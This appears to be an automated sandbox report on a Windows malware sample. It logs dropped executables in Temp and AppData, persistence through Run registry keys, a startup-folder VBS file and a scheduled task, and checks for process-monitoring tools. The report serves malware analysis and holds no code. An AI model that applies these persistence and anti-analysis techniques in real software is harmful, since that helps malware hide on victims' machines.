Source: 7.2.pohtent2.exe.3e8cdc0.1.raw.unpack, HRvWDSFd72tV73B97a.cs	High entropy of concatenated method names: 'z8YwAUsVM', 'maYY4cSS5', 'JZq8J7QDL', 'FiM4ZdIcvpFywHU6Ocn', 'NX4bfYIC8hunNyB4gLM', 'Q58RCgIaTCPUDV3Ai1n', 'xHALwkI9V2kxTuOTwfw', 'WuRSqWI3JJe5YuO4HDq', 'mV66lEIRFTHZ5o7VngA', 'wEJJTgInjYmVASZoKYi'
Source: 7.2.pohtent2.exe.3e8cdc0.1.raw.unpack, qZd874ssH8FbjZUkwHY.cs	High entropy of concatenated method names: 'HKUHnhAGy0NhBP8bx4d', 'Idqf7vAXnrcrWZHclfh', 'iuhfUm75Cy', 'o1fPUVAzrIhg4drV8tj', 'nGlkxgOHHVXwNLfdTEi', 'PoCuMtOPlUk182JaXs9', 'KyY1pmO18x8ktuojdpP', 'iIDRkxOsPmVUH768QR6', 'ILdKaKOfZZAdxOkMgWm', 'eHX8bHO6sud1oo1GG60'
Source: 7.2.pohtent2.exe.3e8cdc0.1.raw.unpack, VlHlTsDtqT7hyjwdYx.cs	High entropy of concatenated method names: 'iJN1oHbVBJ', 'z5g1pNxQWl', 'EUM2WVQFfpBa9IHUYr0', 'kB4U07QUXBmOQmFuO0n', 'MN3u45Qord6g5Cp63ws', 'sIHVJ6Q0Sui1ODjqqjl', 'UupNtuQBoqbjxCbD34y', 'Okp1wnCSUk', 'N0D1Y6uURE', 'I9i0mYQrTs639O9A6cx'
Source: 7.2.pohtent2.exe.3e8cdc0.1.raw.unpack, THuJdNm83ANwrdBExh.cs	High entropy of concatenated method names: 'Ad3iCRroN', 'MwfNC4kqt', 'eAR4Rp2hD', 'qvxk0Ebff', 'NdcEgoa5p', 'Gs5l4bFjA', 'j2RWMZIQr7vAIhCUW12', 'qCCWgKIAfYp0vmFJr9c', 'SCE1yqIONqockvCv6B5', 'a0u0M8IqVOB5LEGLsc5'
Source: 7.2.pohtent2.exe.3e8cdc0.1.raw.unpack, bEuExf2uBBP3wVeiBX.cs	High entropy of concatenated method names: 'Eva5WiDiM', 'CM5KlFwhj', 'KF10ZahJx', 'yPYMNQIFt70LsYWrjaj', 'ssfiEgIoMUdoj1tRCxk', 'EOX7FsIpQQMOx2451y9', 'pYv9jpIUNPNxH05TSUV', 'IOLGSYIwolRXlh40Y5Y', 'Og0MGOGFM', 'Or473P4oU'
Source: 7.2.pohtent2.exe.3e8cdc0.1.raw.unpack, Vp1YaK1zC5LZmvt4rGU.cs	High entropy of concatenated method names: 'xv1qQKiQeb', 'aIuIy8Ax9cDFK0cDqEV', 'vw7Z7qAbXcNBxpKKJmm', 'x5i8bHALfMQkFA3RSd9', 'glO9qTAytQKW1WVGhIR', 'D1VqxJA3y5yhQUgGl9K', 'S4tNtRAe4r2ECQCjoEe', 'kLNSq1ADDei6TUCw8Uc', 'SuQym6ARMRBrhutpNg9', 'thCoAsAcYWOMDlIamMG'
Source: 7.2.pohtent2.exe.3e8cdc0.1.raw.unpack, JjbvDlfux2u9iZkGHY2.cs	High entropy of concatenated method names: 'vR76O4MIt5', 'bb66qOUksQ', 'yif6Sb81vN', 'm596m5afxO', 'Fxp6Ve1gm2', 'm3t6i2laE4', 'gfw6NjLEsk', 'Hbd64VbYNr', 'E0W6kTGU3X', 'u0U6EfpOGt'

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	File created: C:\Users\user\AppData\Roaming\TypeId.exe	Jump to dropped file
Source: C:\Users\user\Desktop\lIocM276SA.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\pohtent2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4477947f1f.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0717674af5.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2090621607.exe	Jump to behavior

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs

Jump to dropped file

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\lIocM276SA.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\lIocM276SA.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs

Jump to behavior

Source: C:\Users\user\Desktop\lIocM276SA.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2090621607.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2090621607.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0717674af5.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0717674af5.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4477947f1f.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4477947f1f.exe	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\97AF5D8F5609ACEBE32630E366735C18 deae96a4ec2235f9320bb4a6574aa001

Source: C:\Users\user\Desktop\lIocM276SA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process information set: NOOPENFILEERRORBOX
